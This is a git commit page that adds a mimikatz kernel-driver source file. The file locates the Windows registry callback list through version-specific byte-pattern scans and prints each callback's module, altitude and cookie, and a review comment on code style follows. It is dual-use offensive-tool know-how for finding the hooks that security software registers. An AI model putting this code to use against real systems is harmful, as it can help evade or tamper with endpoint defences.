authorMatt Graeber <mattgraeber@gmail.com>2013-10-01 14:29:34 -0700
committerMatt Graeber <mattgraeber@gmail.com>2013-10-01 14:29:34 -0700
commit6ad050fe7a54ae7c47fda4505043df8efd82bc2e (patch)
tree9c99d9aa042a4752991cfe8f0069c9a4823c8d42 /Exfiltration/mimikatz-1.0/driver/notify_reg.c
parent23850a6337bf79d02f68912e49df12f3cde4a8dd (diff)
parent59cd18360764af6e6133ad11ec9cd8295372e587 (diff)
Merge pull request #15 from clymb3r/master
Adding GitIgnore, adding Invoke-NinjaCopy and Invoke-Mimikatz
Diffstat (limited to 'Exfiltration/mimikatz-1.0/driver/notify_reg.c')
-rw-r--r--Exfiltration/mimikatz-1.0/driver/notify_reg.c137
1 files changed, 137 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/driver/notify_reg.c b/Exfiltration/mimikatz-1.0/driver/notify_reg.c
new file mode 100644
index 0000000..843cfba
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/driver/notify_reg.c
@@ -0,0 +1,137 @@
+#include "notify_reg.h"
+
+ULONG * CmpCallBackCount = NULL;
+PVOID * CmpCallBackVector = NULL;
+PLIST_ENTRY CallbackListHead = NULL;
+
+NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
+{
+ NTSTATUS status;
+ ULONG i;
+ PKIWI_CALLBACK monCallBack;
+ PLIST_ENTRY maListe;
+ PKIWI_REGISTRY6_CALLBACK monCallBack6;
+
+ *ppszDestEnd = pszDest; *pcbRemaining= cbDest;
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyRegistry\n\n");
+ if(NT_SUCCESS(status))
+ {
+ status = getNotifyRegistryRoutine();
+ if(NT_SUCCESS(status))
+ {
+ if(INDEX_OS < INDEX_VISTA)
+ {
+ for(i = 0; (i < *CmpCallBackCount) && NT_SUCCESS(status) ; i++)
+ {
+ monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(CmpCallBackVector[i]);
+ if(monCallBack != NULL)
+ {
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
+ if(NT_SUCCESS(status))
+ {
+ status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
+ if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
+ {
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
+ L" - cookie %#.I64x\n", *(monCallBack->opt_cookie)
+ );
+ }
+ }
+ }
+ }
+ }
+ else
+ {
+ for(maListe = CallbackListHead->Flink, i = 0; (maListe != CallbackListHead) && NT_SUCCESS(status) ; maListe = maListe->Flink, i++)
+ {
+ monCallBack6 = (PKIWI_REGISTRY6_CALLBACK) (((ULONG_PTR) maListe) + sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG)));
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
+ if(NT_SUCCESS(status))
+ {
+ status = getModuleFromAddr((ULONG_PTR) monCallBack6->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
+ if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
+ {
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
+ L" - alt %wZ - cookie %#.I64x\n", &(monCallBack6->altitude), monCallBack6->cookie);
+ }
+ }
+ }
+ }
+ }
+ }
+ return status;
+}
+
+NTSTATUS getNotifyRegistryRoutine()
+{
+ NTSTATUS retour = STATUS_NOT_FOUND;
+ #ifdef _M_X64
+ UCHAR PTRN_WNT5_Vector[]= {0x4c, 0x8d, 0x3d};
+ UCHAR PTRN_WNT5_Count[] = {0x0f, 0xc1, 0x05};
+
+ UCHAR PTRN_WN60_Head[] = {0x48, 0x8b, 0xf0, 0x48};
+ LONG OFFS_WN60_Head = -9;
+ UCHAR PTRN_WALL_Head[] = {0x48, 0x8b, 0xf8, 0x48};
+ LONG OFFS_WALL_Head = -9;
+ #elif defined _M_IX86
+ UCHAR PTRN_WNT5_Vector[]= {0x53, 0x56, 0x57, 0xbb};
+ UCHAR PTRN_WNT5_Count[] = {0xff, 0xb9};
+
+ UCHAR PTRN_WN60_Head[] = {0x8b, 0xcb, 0xe8};
+ LONG OFFS_WN60_Head = 12;
+ UCHAR PTRN_WN61_Head[] = {0x8b, 0xc7, 0xe8};
+ LONG OFFS_WN61_Head = -4;
+ UCHAR PTRN_WIN8_Head[] = {0x53, 0x8d, 0x55};
+ LONG OFFS_WIN8_Head = -4;
+ #endif
+ PUCHAR refDebut = (PUCHAR) CmUnRegisterCallback, refFin = refDebut + PAGE_SIZE;
+ PUCHAR pattern = NULL; SIZE_T taille = 0; LONG offsetTo = 0;
+
+ if((CmpCallBackVector && CmpCallBackCount) || CallbackListHead)
+ {
+ retour = STATUS_SUCCESS;
+ }
+ else
+ {
+ if(INDEX_OS < INDEX_VISTA)
+ {
+ retour = genericPointerSearch((PUCHAR *) &CmpCallBackVector, refDebut, refFin, PTRN_WNT5_Vector, sizeof(PTRN_WNT5_Vector), sizeof(PTRN_WNT5_Vector));
+ if(NT_SUCCESS(retour))
+ {
+ retour = genericPointerSearch((PUCHAR *) &CmpCallBackCount, refDebut, refFin, PTRN_WNT5_Count, sizeof(PTRN_WNT5_Count), sizeof(PTRN_WNT5_Count));
+ }
+ }
+ else
+ {
+ if(INDEX_OS < INDEX_7)
+ {
+ pattern = PTRN_WN60_Head;
+ taille = sizeof(PTRN_WN60_Head);
+ offsetTo= OFFS_WN60_Head;
+ }
+ else
+ {
+ #ifdef _M_X64
+ pattern = PTRN_WALL_Head;
+ taille = sizeof(PTRN_WALL_Head);
+ offsetTo= OFFS_WALL_Head;
+ #elif defined _M_IX86
+ if(INDEX_OS < INDEX_8)
+ {
+ pattern = PTRN_WN61_Head;
+ taille = sizeof(PTRN_WN61_Head);
+ offsetTo= OFFS_WN61_Head;
+ }
+ else
+ {
+ pattern = PTRN_WIN8_Head;
+ taille = sizeof(PTRN_WIN8_Head);
+ offsetTo= OFFS_WIN8_Head;
+ }
+ #endif
+ }
+ retour = genericPointerSearch((PUCHAR *) &CallbackListHead, refDebut, refFin, pattern, taille, offsetTo);
+ }
+ }
+ return retour;
+}
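Review bot: The definition `NTSTATUS getNotifyRegistryRoutine()` at the second function is an old-style non-prototype declaration in C; it should read `NTSTATUS getNotifyRegistryRoutine(void)` so that the compiler checks its call in kListNotifyRegistry (which appears before the definition and presumably relies on a prototype in notify_reg.h — verify that header declares it with `(void)` as well). The arithmetic that derives `monCallBack6` from `maListe` (`sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG))`) is an undocumented structure-layout assumption and deserves a comment such as `/* skip the LIST_ENTRY plus two leading fields whose width changed between Vista and 7; layout is version-specific and must be re-checked on new builds */`. The byte arrays `PTRN_*` and `OFFS_*` in getNotifyRegistryRoutine are likewise bare magic values; a one-line comment per pair naming the kernel build they were taken from would make the version-dependence explicit. Neither the vector walk nor the `CallbackListHead` walk validates the pointers it dereferences, so a mismatched pattern on an unanticipated build leads straight to a kernel fault rather than a reported error; at minimum the list walk should be documented as trusting the pattern match.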